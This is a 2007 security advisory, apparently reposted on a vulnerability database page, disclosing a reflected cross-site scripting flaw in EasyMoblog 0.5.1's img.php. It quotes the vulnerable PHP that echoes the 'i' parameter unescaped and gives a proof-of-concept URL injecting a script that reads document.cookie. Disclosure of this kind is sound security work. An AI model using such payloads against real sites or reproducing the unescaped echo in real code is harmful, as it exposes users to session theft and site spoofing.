Lucene search
K

XSS_Vulnerability_EasymoBlog.txt

🗓️ 06 Feb 2007 00:00:00Reported by Tal ArgoniType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Cross Site Scripting vulnerability in EasyMoblog could allow script execution, site spoofing, and more.

Code
`  
  
  
·= Security Advisory =·  
  
Issue: Cross Site Scripting (XSS) Vulnerability in "img.php" by Umberto Caldera.  
Discovered Date: 30/01/2007  
Author: Tal Argoni [talargoni at gmail d0t com]  
Product Vendor: http://sourceforge.net/project/showfiles.php?group_id=88633  
Ver: easymoblog-0.5.1  
  
Details:  
  
EasyMoblog is prone to a Cross Site Scripting Vulnerability.  
The vulnerability exists in "img.php" file, caused by the lack of Input   
Validation/Filtering of quotation and HTML characters in the   
GET parameter "i".  
  
  
Contents of "img.php"  
---------------------------------  
...  
  
<?php  
$img_name = $_GET['i'];  
?>  
  
...  
  
<body>  
<img src="img/posts/<?php echo $img_name; ?>" border="0" alt="" />  
</body>  
...  
  
  
  
  
Exploitation URL:  
http://www.example.com/easymoblog/img.php?i="><script>alert(document.cookie);</script><img src=  
  
Successful exploitation may allow execution of script code. This could also be exploited to   
spoof the entire website's content,  
create fake login menu's for all the platform's users, commit Denial Of Service attacks and more...  
  
Proof Of Concept:  
http://www.example.com/easymoblog/img.php?i="><script>alert(document.cookie);</script><img src=  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation